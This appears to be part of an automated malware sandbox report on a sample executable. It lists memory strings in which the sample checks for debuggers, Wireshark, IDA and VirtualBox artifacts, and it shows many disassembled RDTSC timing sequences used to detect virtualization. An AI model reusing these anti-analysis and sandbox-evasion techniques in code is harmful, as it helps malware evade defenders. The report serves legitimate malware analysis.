Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1256575 second address: 125657D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 126410B second address: 1264152 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4970E062CCh 0x00000008 jmp 00007F4970E062CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F4970E062E7h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12646A2 second address: 12646AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F4970D67E86h 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1264802 second address: 1264808 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1264945 second address: 1264949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1264949 second address: 1264953 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1264953 second address: 1264968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4970D67E8Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1264968 second address: 126496C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267886 second address: 126788A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12679FB second address: 1267A6A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4970E062C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6DCE2B5Ch 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F4970E062C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d lea ebx, dword ptr [ebp+1244D661h] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F4970E062C8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jng 00007F4970E062CCh 0x00000053 mov dword ptr [ebp+1244CDE2h], ecx 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267A6A second address: 1267A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267A6E second address: 1267A74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267A74 second address: 1267A9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4970D67E8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970D67E94h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267A9D second address: 1267AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267AA1 second address: 1267AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1267C1F second address: 1267C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1254A7B second address: 1254A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4970D67E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1254A87 second address: 1254A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1254A8B second address: 1254ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970D67E98h 0x00000012 jmp 00007F4970D67E8Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1254ACF second address: 1254ADD instructions: 0x00000000 rdtsc 0x00000002 js 00007F4970E062C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1254ADD second address: 1254AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1287249 second address: 12872B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062D3h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4970E062CFh 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F4970E062C6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push edx 0x0000001c jmp 00007F4970E062D7h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pop edx 0x00000024 popad 0x00000025 jo 00007F4970E062F9h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007F4970E062D4h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12872B6 second address: 12872BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12873F5 second address: 12873F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12873F9 second address: 128740D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F4970D67E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F4970D67E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128740D second address: 1287417 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1287417 second address: 1287425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12875BD second address: 12875C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128788E second address: 1287898 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4970D67E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12879DA second address: 12879E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12879E0 second address: 12879EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jns 00007F4970D67E86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12879EF second address: 12879F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1287B6C second address: 1287B7D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4970D67E86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1287E60 second address: 1287E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1287E72 second address: 1287E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 127AF1F second address: 127AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128815E second address: 1288163 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288163 second address: 1288173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4970E062C6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288865 second address: 1288879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4970D67E8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288879 second address: 128887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288B84 second address: 1288B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288B8C second address: 1288BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062D7h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288BAE second address: 1288BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288BB2 second address: 1288BC7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F4970E062C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288BC7 second address: 1288BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 127AF0B second address: 127AF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 js 00007F4970E062C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1288E66 second address: 1288EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4970D67E86h 0x0000000a jmp 00007F4970D67E8Dh 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 jp 00007F4970D67E86h 0x00000019 je 00007F4970D67E86h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F4970D67E92h 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128A4AE second address: 128A4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F4970E062D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F4970E062C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128B59F second address: 128B5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 128F12F second address: 128F14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062CBh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d js 00007F4970E062E3h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129290F second address: 1292918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292918 second address: 129291C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129291C second address: 1292920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292A55 second address: 1292A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292A5D second address: 1292A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E90h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F4970D67E86h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292A81 second address: 1292A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292A9C second address: 1292AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292AA2 second address: 1292AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292C2E second address: 1292C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4970D67E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292C38 second address: 1292C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F4970E062F3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F4970E062C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1292C4E second address: 1292C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1293317 second address: 1293324 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4970E062C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1295120 second address: 129512E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F4970D67E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1295204 second address: 1295223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F4970E062D3h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1295223 second address: 1295263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F4970D67E8Fh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F4970D67E98h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12955CD second address: 12955D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12955D1 second address: 12955E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4970D67E8Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12956B2 second address: 12956D0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970E062CFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129578D second address: 1295791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1295962 second address: 1295996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4970E062D7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4970E062D2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1295F62 second address: 1295F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129604B second address: 129604F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12963E2 second address: 12963E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12963E7 second address: 12963ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129656C second address: 129658A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4970D67E92h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129658A second address: 12965A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1296AF7 second address: 1296B19 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4970D67E93h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F4970D67E94h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1296B19 second address: 1296B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1297501 second address: 1297519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1297519 second address: 1297596 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F4970E062C8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b and di, 878Ah 0x00000030 push 00000000h 0x00000032 xor dword ptr [ebp+122D2189h], ecx 0x00000038 xchg eax, ebx 0x00000039 ja 00007F4970E062E7h 0x0000003f push eax 0x00000040 pushad 0x00000041 jmp 00007F4970E062D1h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129859F second address: 129862E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F4970D67E8Ah 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F4970D67E88h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 and si, 0609h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F4970D67E88h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 push 00000000h 0x00000054 jnp 00007F4970D67E88h 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c jmp 00007F4970D67E94h 0x00000061 push eax 0x00000062 push edx 0x00000063 jng 00007F4970D67E86h 0x00000069 rdtsc
